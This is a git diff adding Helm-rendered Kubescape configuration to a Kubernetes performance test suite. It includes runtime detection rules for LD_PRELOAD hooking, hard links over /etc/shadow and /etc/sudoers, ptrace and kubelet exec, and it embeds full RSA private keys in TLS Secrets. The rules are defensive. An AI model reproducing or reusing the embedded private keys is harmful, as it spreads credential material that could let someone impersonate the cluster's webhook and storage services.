configuration file (' + event.path + ') was modified by process + (' + event.comm + ')' + ruleExpression: + - eventType: exec + expression: >- + event.comm != 'java' && event.containerName != 'matlab' && + process.get_ld_hook_var(event.pid) != '' + - eventType: open + expression: >- + event.path == '/etc/ld.so.preload' && has(event.flagsRaw) && + event.flagsRaw != 0 + uniqueId: 'eventType == ''exec'' ? ''exec_'' + event.comm : ''open_'' + event.path' + id: R1011 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1574.006 + name: ld_preload hooks technique detected + profileDependency: 1 + severity: 5 + supportPolicy: true + tags: + - exec + - malicious + - applicationprofile + - description: Detecting hardlink creation over sensitive files. + enabled: true + expressions: + message: >- + 'Hardlink created over sensitive file: ' + event.oldPath + ' - ' + + event.newPath + ruleExpression: + - eventType: hardlink + expression: >- + (event.oldPath.startsWith('/etc/shadow') || + event.oldPath.startsWith('/etc/sudoers')) && + !ap.was_path_opened(event.containerId, event.oldPath) + uniqueId: event.comm + '_' + event.oldPath + id: R1012 + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + name: Hard link created over sensitive file + profileDependency: 1 + severity: 5 + supportPolicy: true + tags: + - files + - malicious + - applicationprofile + - description: Detecting potentially malicious ptrace usage. + enabled: true + expressions: + message: '''Malicious ptrace usage detected from: '' + event.comm' + ruleExpression: + - eventType: ptrace + expression: 'true' + uniqueId: event.exepath + '_' + event.comm + id: R1015 + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1622 + name: Malicious Ptrace Usage + profileDependency: 2 + severity: 5 + supportPolicy: false + tags: + - process + - malicious + - description: >- + Detects io_uring operations that were not recorded during the initial + observation period, indicating potential unauthorized activity. + enabled: true + expressions: + message: >- + 'Unexpected io_uring operation detected: (opcode=' + + string(event.opcode) + ') flags=0x' + (has(event.flagsRaw) ? + string(event.flagsRaw) : '0') + ' in ' + event.comm + '.' + ruleExpression: + - eventType: iouring + expression: 'true' + uniqueId: string(event.opcode) + '_' + event.comm + id: R1030 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1218 + name: Unexpected io_uring Operation Detected + profileDependency: 0 + severity: 5 + supportPolicy: true + tags: + - syscalls + - io_uring + - applicationprofile + - description: >- + Detects plaintext exec API calls intercepted from kubelet TLS + connections, indicating potential unauthorized command execution via the + kubelet API. + enabled: true + expressions: + message: >- + 'Kubelet TLS exec request intercepted: ' + event.tlsData + ' (len=' + + string(event.tlsDataLen) + ', type=' + string(event.tlsEventType) + + ') in ' + event.comm + '.' + ruleExpression: + - eventType: kubelet_tls + expression: 'true' + uniqueId: event.comm + '_' + string(event.tlsEventType) + id: R1031 + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1609 + name: Kubelet TLS Exec Request Detected + profileDependency: 0 + severity: 8 + supportPolicy: false + tags: + - kubelet + - tls + - exec + - container_administration_command diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml new file mode 100644 index 00000000000..cb9e252b95e --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape-values.yaml @@ -0,0 +1,38 @@ +storage: + image: + repository: ghcr.io/k8sstormcenter/storage + tag: "dev-e64d59a" + +nodeAgent: + image: + repository: ghcr.io/k8sstormcenter/node-agent + tag: "dev-e64d59a" + config: + maxLearningPeriod: 2m + learningPeriod: 2m + updatePeriod: 10000m + # The Service declares a "prometheus" port (8080) but node-agent's stock + # config disables the exporter. Enable it so the perf_tool's + # KubescapeNodeAgentMetrics recorder can scrape per-node alert/event + # counters. Note: the chart key is the string "enable"/"disable", which + # the chart converts to the JSON `prometheusExporterEnabled` boolean + # in the node-agent ConfigMap. + prometheusExporter: enable + ruleCooldown: + ruleCooldownDuration: 0h + ruleCooldownAfterCount: 1000000000 + ruleCooldownOnProfileFailure: false + ruleCooldownMaxSize: 20000 +capabilities: + runtimeDetection: enable + networkEventsStreaming: disable + # Top-level prometheusExporter capability gate. Both this and + # nodeAgent.config.prometheusExporter must be `enable` for the node-agent + # to bind on port 8080. + prometheusExporter: enable +alertCRD: + installDefault: true + scopeClustered: true +clusterName: bobexample +ksNamespace: honey +excludeNamespaces: "kubescape,kube-system,kube-public,kube-node-lease,local-path-storage,gmp-system,gmp-public,storm,lightening,cert-manager,kube-flannel,ingress-nginx,olm,px-operator,honey,pl,clickhouse" diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.kube-system.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.kube-system.yaml new file mode 100644 index 00000000000..392f98dd58f --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.kube-system.yaml @@ -0,0 +1,25 @@ +apiVersion: rbac.authorization.k8s.io/v1 +kind: RoleBinding +metadata: + name: storage-auth-reader + namespace: kube-system + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: Role + name: extension-apiserver-authentication-reader +subjects: +- kind: ServiceAccount + name: storage + namespace: honey diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml new file mode 100644 index 00000000000..1784290193f --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/kubescape.rendered.yaml @@ -0,0 +1,4433 @@ +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: operatorcommands.kubescape.io +spec: + group: kubescape.io + names: + plural: operatorcommands + singular: operatorcommand + kind: OperatorCommand + shortNames: + - opcmd + scope: Namespaced + versions: + - name: v1alpha1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + spec: + type: object + properties: + guid: + type: string + commandType: + type: string + commandVersion: + type: string + nullable: true + designators: + type: array + items: + type: object + additionalProperties: true + body: + type: string + format: byte + nullable: true + ttl: + type: string + format: duration + nullable: true + args: + type: object + additionalProperties: true + nullable: true + commandIndex: + type: integer + nullable: true + commandCount: + type: integer + nullable: true + status: + type: object + properties: + started: + type: boolean + startedAt: + type: string + format: date-time + nullable: true + completed: + type: boolean + completedAt: + type: string + format: date-time + nullable: true + executer: + type: string + nullable: true + error: + type: object + nullable: true + properties: + reason: + type: string + nullable: true + message: + type: string + nullable: true + errorCode: + type: integer + nullable: true + payload: + type: string + format: byte + nullable: true + subresources: + status: {} +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: rules.kubescape.io +spec: + group: kubescape.io + names: + kind: Rules + listKind: RulesList + plural: rules + singular: rule + scope: Namespaced + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + apiVersion: + type: string + kind: + type: string + metadata: + type: object + spec: + type: object + properties: + rules: + type: array + items: + type: object + properties: + enabled: + type: boolean + description: Whether the rule is enabled + id: + type: string + description: Unique identifier for the rule + name: + type: string + description: Name of the rule + description: + type: string + description: Description of the rule + expressions: + type: object + properties: + message: + type: string + description: Message expression + uniqueId: + type: string + description: Unique identifier expression + ruleExpression: + type: array + items: + type: object + properties: + eventType: + type: string + description: Type of event this expression handles + expression: + type: string + description: The rule expression string + required: + - eventType + - expression + required: + - message + - uniqueId + - ruleExpression + profileDependency: + type: integer + enum: + - 0 + - 1 + - 2 + description: Profile dependency level (0=Required, 1=Optional, + 2=NotRequired) + severity: + type: integer + description: Severity level of the rule + supportPolicy: + type: boolean + description: Whether the rule supports rule policy enforcement + default: false + tags: + type: array + items: + type: string + description: Tags associated with the rule + state: + type: object + additionalProperties: true + description: State information for the rule + agentVersionRequirement: + type: string + description: Agent version requirement to evaluate this rule + (supports semver ranges like ~1.0, >=1.2.0, etc.) + isTriggerAlert: + type: boolean + description: Whether the rule is a trigger alert + default: true + mitreTechnique: + type: string + description: MITRE technique associated with the rule + mitreTactic: + type: string + description: MITRE tactic associated with the rule + required: + - enabled + - id + - name + - description + - expressions + - profileDependency + - severity + - supportPolicy + - isTriggerAlert + - mitreTechnique + - mitreTactic + required: + - rules + subresources: + status: {} +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: servicesscanresults.kubescape.io +spec: + group: kubescape.io + names: + kind: ServiceScanResult + plural: servicesscanresults + shortNames: + - kssa + singular: servicescanresult + scope: Namespaced + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + spec: + type: object + properties: + clusterIP: + type: string + ports: + type: array + items: + type: object + properties: + port: + type: integer + protocol: + type: string + sessionLayer: + type: string + presentationLayer: + type: string + applicationLayer: + type: string + authenticated: + type: boolean + nullable: true +--- +apiVersion: apiextensions.k8s.io/v1 +kind: CustomResourceDefinition +metadata: + name: runtimerulealertbindings.kubescape.io +spec: + group: kubescape.io + names: + kind: RuntimeRuleAlertBinding + plural: runtimerulealertbindings + shortNames: + - rab + singular: runtimerulealertbinding + scope: Cluster + versions: + - name: v1 + served: true + storage: true + schema: + openAPIV3Schema: + type: object + properties: + spec: + type: object + properties: + namespaceSelector: + type: object + properties: + matchExpressions: + type: array + items: + type: object + properties: + key: + type: string + operator: + type: string + values: + type: array + items: + type: string + matchLabels: + type: object + additionalProperties: + type: string + podSelector: + type: object + properties: + matchExpressions: + type: array + items: + type: object + properties: + key: + type: string + operator: + type: string + values: + type: array + items: + type: string + matchLabels: + type: object + additionalProperties: + type: string + rules: + type: array + items: + type: object + oneOf: + - not: + anyOf: + - required: + - ruleID + - required: + - ruleName + required: + - ruleTags + - not: + anyOf: + - required: + - ruleTags + - required: + - ruleName + required: + - ruleID + - not: + anyOf: + - required: + - ruleTags + - required: + - ruleID + required: + - ruleName + properties: + parameters: + type: object + additionalProperties: true + ruleID: + type: string + ruleName: + type: string + ruleTags: + type: array + items: + type: string + severity: + type: string +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubescape + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubescape + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: kubescape + namespace: honey +automountServiceAccountToken: false +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: kubevuln + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: kubevuln + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: kubevuln + namespace: honey +automountServiceAccountToken: false +--- +apiVersion: v1 +kind: ServiceAccount +metadata: + name: node-agent + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: operator + namespace: honey +automountServiceAccountToken: false +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: prometheus-exporter + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: prometheus-exporter + tier: ks-control-plane + kubescape.io/ignore: 'true' + name: prometheus-exporter + namespace: honey +automountServiceAccountToken: false +--- +kind: ServiceAccount +apiVersion: v1 +metadata: + name: storage + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +--- +kind: Secret +apiVersion: v1 +metadata: + name: cloud-secret + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: cloud-secret + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: cloud-secret + tier: ks-control-plane + kubescape.io/ignore: 'true' + kubescape.io/infra: credentials +type: Opaque +data: + account: '' + accessKey: '' +--- +apiVersion: v1 +kind: Secret +metadata: + name: kubescape-admission-webhook.honey.svc-kubescape-tls-pair + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +type: kubernetes.io/tls +data: + tls.key: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFcEFJQkFBS0NBUUVBMzFENjV6WGVoZzBKd0ZIS1pBYXBuNUhtYUwycVdyaE9tVllNTUJPVlVyU2VIdGgwCjZVUHRNbUVXZFhrM2ZCUURUbEtZTWJBVERPMm4vVmdZMnRjRFlhM0ZRUFVNdmlRWHVRN21Ud29kVnJ1YkpKUVkKeldBeWR2aUVRdDk4dlVLeFQ1L2NGT1pyRUs1UGVSeXJjUzNJWHZnQWpMR3J6UlI3RG5kcmtuV0JhTHNVcXp0Ngp6b3E3bjVLSXlndm5yU3YrTCtOejkrb3FRKzB3UWFnTVpoL3FqRDBoR21xS0N2VkhtWUJsRUIvMlgrSGV4UTJXClV5SkV1Tis2L0xWYkpKaktueFZkQlMra0JFL0pXSUFad2xDbDI4Z3FRN1AweDVoK3JldHpqZ2VVemJFUGNORFkKYmhSdUYxOVNzSGM1MlRib2EwWk9jUE1ic3NrbC9kRDdRUkYwQ1FJREFRQUJBb0lCQUNaSWVLcllaa3h1d2NReApnVlBDZktPNVhGbUtZa0RwSmJoTnN3c3U0RU5zYVVyNmFwaHVwNlFpVnJwT3pIODk0dzh6UTVvSkNFc0lGdXRzCmhkNUdTL01iMmh2M3BuYVdNMmJyTWZwTXpwakcwcUxqckpqUXEvWVBSb1U4VU9NVkl0WjJua0VLKzBIQjBDZ0EKRFRmNjFFWExtRFNHWk9Ca2FYQWljdE9KeDJTUGs4RTJxaUJHVEEvSmorNmdOWHJod2V0SndvbW9jRzhsSG1tdQpzYzhnZlJrcnJuR2dmZ1dDWDEwM0czcGRqTGwzT0dtQ0xHRWVnV1ZUKzYzUExncFJnT29vbmkxcFBOdVRlbkpRCks2MFozVWJFVWt2VmJtWXBtMWRGR2hQMDBlZ1VWY3NzK242UEEzUlgwdDRocmpQQnYyYjJQOTVwQVVLOHkwN2kKdGY3bkZEMENnWUVBNWNSaDExSXh4anZDemYrZkJ0OUtNb2NmWjY0LytZVGFFTml1dzlMSk5kT3I4M01FM0wvOQpnTGpTbmsvS2p4eVM5OEV5WFZMSFduSm5yYlBxeWdrYmJvT3Zxejd6UjhWbUZHQURnQzlXMzc3SUJJRzByME54CnZKTnNYeFlXS2RKWm8wMzcrMGFvcUU1VmhSQXZqYTJhUm9QSDdmWVRlcFdoQ0JFMnFNQ2NwS2NDZ1lFQStOQU4KL2pLcndVYktiVXFkb3p3TDdtZ2hJZXpFWG80N1daWks1RHIzMGZhTXhFTU1vekxaOC9VbkVxbk1OUXJZamhaMQppQld2ZGthZXJJUm5DcEZmS2NIKzhlcUdPZWxkNmloa09CekxwWVBYdVVzUGp1VnNwMnlKMllyeTV2Q0pFMnMwCmI0VERiZ2RPVU5RYkFTYmxjK0lmeGdXWTR2TEdDNURwYWpzU1I4OENnWUE2M1VNTHZQMFBna1A0THFMNVNiOWkKam9lWE1tY2xiOG5HUXgwVEFpK1dZTEpPM29yQ1cxV0E0dGppd2lKczQ2OHJWZzJuSnd2M3VoT2h4dFJDQ205QwpzdTRRZTBJc2d3QVIvRDhwV2ZkeHZ4alRQcitobnkvR1ZpYVBmY01UMTlZckpsR0dJS1lZNkdpMGZGOFNkd1Z0ClIxbXpOelhxVStjN2Y5MTNBbEdmUlFLQmdRQ083WDFNUzdGTVdxMEg4VGZ5d0JpZWdDU2dSMUZhZTl2dUQ1Ni8KMG52dm1mQ3RBVk11SUpVQlJnK0c4aEZEV3hLaE5KZVpiOU9XWHVUaGQwRjEyYUpQNjRmWFVnQi9IZVo4RDIzYQpxZmYyQVhHWG1GMjhtV0E4SU9aakdDV0dzaUFjRHBaVmhXOTZNaW96MWxRWTZrNGVyb1BRRGdFUVJhT3NtemJxCmRqcC9Fd0tCZ1FDd2xlZWpEbkpWN3lJY0J0MElLWUtEdFVPS0RINm5ZbFltTUxrWkZtazBsSW1HRGw4cElpRXcKVTFrZ0lVcnZ5VHBmb3QzdFk3NXVFTW5KSGYvSkFHWkFCNnlHa2dVRzZvRmRQN0N5YUJLMjRSYndUTUk3WmpreQpFUXFvSWVwKzdIUWt6dy9QRzB2VmtZTTQ1KzIrc24renZHeXNYdTVOdFltdEp6cjVFQ3ZicFE9PQotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQ== + tls.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURaRENDQWt5Z0F3SUJBZ0lRS0VWZE13bGF5QUU5R2hmeERNRWQzekFOQmdrcWhraUc5dzBCQVFzRkFEQVcKTVJRd0VnWURWUVFEREFzcUxtaHZibVY1TG5OMll6QWVGdzB5TmpBME1qVXdOak0xTVRoYUZ3MHlPVEF5TVRJdwpOak0xTVRoYU1EQXhMakFzQmdOVkJBTVRKV3QxWW1WelkyRndaUzFoWkcxcGMzTnBiMjR0ZDJWaWFHOXZheTVvCmIyNWxlUzV6ZG1Nd2dnRWlNQTBHQ1NxR1NJYjNEUUVCQVFVQUE0SUJEd0F3Z2dFS0FvSUJBUURmVVBybk5kNkcKRFFuQVVjcGtCcW1ma2Vab3ZhcGF1RTZaVmd3d0U1VlN0SjRlMkhUcFErMHlZUloxZVRkOEZBTk9VcGd4c0JNTQo3YWY5V0JqYTF3TmhyY1ZBOVF5K0pCZTVEdVpQQ2gxV3U1c2tsQmpOWURKMitJUkMzM3k5UXJGUG45d1U1bXNRCnJrOTVIS3R4TGNoZStBQ01zYXZORkhzT2QydVNkWUZvdXhTck8zck9pcnVma29qS0MrZXRLLzR2NDNQMzZpcEQKN1RCQnFBeG1IK3FNUFNFYWFvb0s5VWVaZ0dVUUgvWmY0ZDdGRFpaVElrUzQzN3I4dFZza21NcWZGVjBGTDZRRQpUOGxZZ0JuQ1VLWGJ5Q3BEcy9USG1INnQ2M09PQjVUTnNROXcwTmh1Rkc0WFgxS3dkem5aTnVoclJrNXc4eHV5CnlTWDkwUHRCRVhRSkFnTUJBQUdqZ1pNd2daQXdEZ1lEVlIwUEFRSC9CQVFEQWdXZ01CMEdBMVVkSlFRV01CUUcKQ0NzR0FRVUZCd01CQmdnckJnRUZCUWNEQWpBTUJnTlZIUk1CQWY4RUFqQUFNQjhHQTFVZEl3UVlNQmFBRk54aApoU3I0ZmhScnVScFpabnlSWUpRanA1WjhNREFHQTFVZEVRUXBNQ2VDSld0MVltVnpZMkZ3WlMxaFpHMXBjM05wCmIyNHRkMlZpYUc5dmF5NW9iMjVsZVM1emRtTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBQmQ3NXhRV2RaeUQKTVF3a09YSkdBZ1h2VTAxUXh2SmhvMTZZMlVlbjk5T2o2SzBRVjNrRkRnUE15MEo0RHdGdkhiNjhLK0s3YnpuWgoxN1RzTlJwbmQxNDR2OElwUW0rL2JHYThmQkJibnJTeTZJWUZzejZrUkFMdERONXJGM0IzT3JsOE9NMFNna3RYCkNrdVc2ZGNOdXBnOTUyTXNVdDJCL2g5Z2lDbXY4N05VRWZXNUZJOGZ1amtTbktxT2lvSXpKek44NURLSENxOEMKOFZhbFJEMXZ4cDdZK3NRT2dqOTJmY1dXQUlYZDRlZnBkS1dNNHJCWGJhSUVKdGNPK3dNV0dvdU5iY2t3bTQxZQphZkR0V3J1eWx5M1RVRDY1NUpQSDVoZFFnNkFNNlRlNzQ2NGtRUElRSmN1R0R4U1dPTjVJaW5ncjlzTlRGUVhzClc5NlRVWjhDSzU0PQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg== +--- +apiVersion: v1 +kind: Secret +metadata: + name: storage-ca + namespace: honey + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: storage + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: storage + tier: ks-control-plane + kubescape.io/ignore: 'true' +type: kubernetes.io/tls +data: + tls.crt: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURjekNDQWx1Z0F3SUJBZ0lSQU1Hd29nRElPWXh1c01nTGNHZnlIR2N3RFFZSktvWklodmNOQVFFTEJRQXcKSURFZU1Cd0dBMVVFQXhNVmMzUnZjbUZuWlMwMFV6VkhVM0ZaVG1JNUxXTmhNQjRYRFRJMk1EUXlOVEEyTXpVeApPRm9YRFRJNE1EUXlOREEyTXpVeE9Gb3dKekVsTUNNR0ExVUVBeE1jYzNSdmNtRm5aUzVvYjI1bGVTNXpkbU10ClNVUlRSakJMTkhaa09EQ0NBU0l3RFFZSktvWklodmNOQVFFQkJRQURnZ0VQQURDQ0FRb0NnZ0VCQU5wcWptbk8KaSthZ0FjbkZKY0h5bGRxa1pVdXFMNTZDbThja0t1MlpwV3p5LzF3RlJST1pGL09qQTlaWWl5aUVFc0tqbVpFaQpVRmRNY2FRQ0I1Qm5hSWdzQThUc2dRSXlpNEVLa3MzQUhIME03QXpFc3gxc3ZZRTYrRUkyYmNqUUZqelp5Nm1yClp2OEs5VGhWSVVQMDNDSG1kbkFXbERHN3Mva2VINWE3eEVaSUFIYTBrK3ljVk5uVmtyK1EzVTRwUUpSNUZhU04KMzR3NDcyUWdDc21DcSt3QlA4WjRFT3hsYWszT3hneUpYZ0ZiU0lnaXAwZTgrS1pSVWRxZTJTWXppUVRNYldBQgpVNmJoaDFrZTdGUElMV1VTelQxaGl2N1o4UEc5ZjdSQ1VJTW5JTjY4Z2pHODFIdGkzRFlvOHN2OEFOMlRhcTlQClFWNDBpN3lVMHlvT2VTa0NBd0VBQWFPQm9EQ0JuVEFPQmdOVkhROEJBZjhFQkFNQ0JhQXdIUVlEVlIwbEJCWXcKRkFZSUt3WUJCUVVIQXdFR0NDc0dBUVVGQndNQ01Bd0dBMVVkRXdFQi93UUNNQUF3SHdZRFZSMGpCQmd3Rm9BVQpTa0ppbzVsQ3BPYzNGb0YzclR3UkxoMkVhL3N3UFFZRFZSMFJCRFl3TklJUmMzUnZjbUZuWlM1b2IyNWxlUzV6CmRtT0NIM04wYjNKaFoyVXVhRzl1WlhrdWMzWmpMbU5zZFhOMFpYSXViRzlqWVd3d0RRWUpLb1pJaHZjTkFRRUwKQlFBRGdnRUJBRGxpRVJ5ZFF4c2VSSWgyTmgwa2drQldxc2NpbEZpaUxYR1VnV1BkQmtaS1dzNUZ6VS9vSVdpeQo5K2k2aHZxM3ZOOEhCTDdENXg1TldOTU8wa08zUzVDa0NYN2g3ank5UE9IMUowNFRDTmRkQ0I1VzRxWnJyOGhxCjlWa3B5eVFHWTRRRTh1UTBxSzJ4L2M3UGllbXNRbkl0czFpT1llclJVNkJqK1ptSjZxc0J3Ykdab0l0NmQ4ZHEKNWp6MUhQZFZhSDlDVGw4ZkxLSk1ibHJFK2ovU1lsKzUyWWVRNVI1T0IzZ1BZT1JUVHg1dERsSXVVT3JPaXRNbwpyYjNyVDB6WW9TdlRvVmpMM09WYzdrS1QyNm9oNHZ3N2dlS0hVTGYySkpUWEk0MCtUL1RpYWtPRi9odERUWm85CndyMkI0UGw1YWdtbHFoYUQxWHpoQXBnRU9ybktvU2c9Ci0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K + tls.key: LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpNSUlFb0FJQkFBS0NBUUVBMm1xT2FjNkw1cUFCeWNVbHdmS1YycVJsUzZvdm5vS2J4eVFxN1ptbGJQTC9YQVZGCkU1a1g4Nk1EMWxpTEtJUVN3cU9aa1NKUVYweHhwQUlIa0dkb2lDd0R4T3lCQWpLTGdRcVN6Y0FjZlF6c0RNU3oKSFd5OWdUcjRRalp0eU5BV1BObkxxYXRtL3dyMU9GVWhRL1RjSWVaMmNCYVVNYnV6K1I0ZmxydkVSa2dBZHJTVAo3SnhVMmRXU3Y1RGRUaWxBbEhrVnBJM2ZqRGp2WkNBS3lZS3I3QUUveG5nUTdHVnFUYzdHRElsZUFWdElpQ0tuClI3ejRwbEZSMnA3WkpqT0pCTXh0WUFGVHB1R0hXUjdzVThndFpSTE5QV0dLL3RudzhiMS90RUpRZ3ljZzNyeUMKTWJ6VWUyTGNOaWp5eS93QTNaTnFyMDlCWGpTTHZKVFRLZzU1S1FJREFRQUJBb0gvQkVRUWhBQ0V1dnhsREl2TgpNUHlMOExsRlFUVVJ1UWJVQkErd3h2TTVSK2QzRlZVRkJGejVHc2tVU2h0d25GbjRBOVV1S3FlQTZqT1VCS0FGCmhjeC9QaW1kNlRxMVNsV3lZOUxSQ3pPMVdydmw0Rm4zSlp2NkY0d1BUVHZDNlNrblJnajY4VlZuclpPSk5wQnoKRmVDeWEvY1VXUndYeU9EaG92dnpvZjRJMTFhSGJEZWVES0lFdFNXRExmL29jaVBWRWhCcERzdzZzQW5iMDFCdAowK2VlVTczUFordHJGazFKZGVWcnoyVG1MUmJyVnpvNDlJYXJYaGVGRE9yT0s5T24vdkNnbEQ0T2NpRGFtUG14CjhEMzVkY1V6T2tXeWZZY0t0UlBMRDRpU3lKL2NSQnlKQllPQkxydG1BTTZmWEVuSVN3ZEJoLzhrNjlyVkZ0V0cKMlBLUkFvR0JBUGlRcVVIUXNyaHdlODRIbzBTUG5hY3NYT1ByQ3o5Z0ZSTVhCS2IrS210UFljL3dLUlAvZHI4Wgp2S3pPUzlCdFg1eU5ia3ZXUmJZMG5lYUlIN2FFcXV0MENVcUJZYnNSSDg4Wndndi95WmlBUGlyUUdGNXpaT3FyClFVOGRWSkpDNXI0a1VWQ2RBZ2o4QlRobjZIR0RxRW5OTHdjaTNZclAzT1VGWmR6UEg5bWxBb0dCQU9EekNVUjEKZjc0dHRPYzNUNEh2U2lnNk5zVVZRTHFFMUxBUkRseUhEalM5WlRVWFYveVUyNFFxc2NIaFRIQmhYUytNeXJoKwpWMGZrVXNwdlUxRk45OW5Zb3p0KzVYVlpHTVpJR3JHS2FYRHg1Z2p1czJ2bVdjY05MMXk1WnVFMkgyaFZkVjM0Cm45c00yWDRxSUhpelRHWWFGUk95dFllT1pFTXVxUWFwREtJMUFvR0FCZE5lSkN6QUE1S2ZWRFRabnNHKzhDd2EKQVQyQkJmczZnemdHNCtNUkczTEEyQjdJMTY4bEdWV0JGb3UvT3lOVkdsWTJQNURHRVg4cU5EejhnVXFhdHVvQgpUYjI2aktmYUZ3Q0RpOFJ5OVNBTVZQU0xuYXNXc21sUkhvbVJjZHdmakZWTmtwWWJkaHB5Qk9CcWtqNkRzemNiCjR3N3VJbEs4MnFGRndlY1kyQUVDZ1lCTHR5STRhOEE2bUJIYS9aQUNjVE9weEtab3dkV09zbVVRZWowMlFiTXoKWjBob2pWbnRSNEYzeEJNZTZpR2JkZm95cGhZWjhWU1pleTJ1dTdmMGx1VEU2NWxOemxHWHBReWt1T0piUGZadApzTTQzMVhpSTZmanYrZTBtTGJXR09ueHAxdEh4ZGwwQUV4d2x6akl0emxQNXplK29PSy9IVjlOQmxiUUk3TisyCnZRS0JnSEhrbDVPcDhkVWdkYTNzS0lLNzduK0JwUUJrcWdsQ1dMTkdkZFhOLyt2MUVpU01XUFNQOGdqa2xPb1gKYkRWUUVCSS9XVERXdUE2Nno2WEVLWHJjWkJRRWtUdjR2TWNFUmozSEloVWNoNDVBNnArZmc1RlhrOVFZQUVpcgoyUGYyUmU1elNhL0JvY0NjN3FFL1BtZjBNVjdzT0FXaWdsemFNeEVRTjUzaXdGd2IKLS0tLS1FTkQgUlNBIFBSSVZBVEUgS0VZ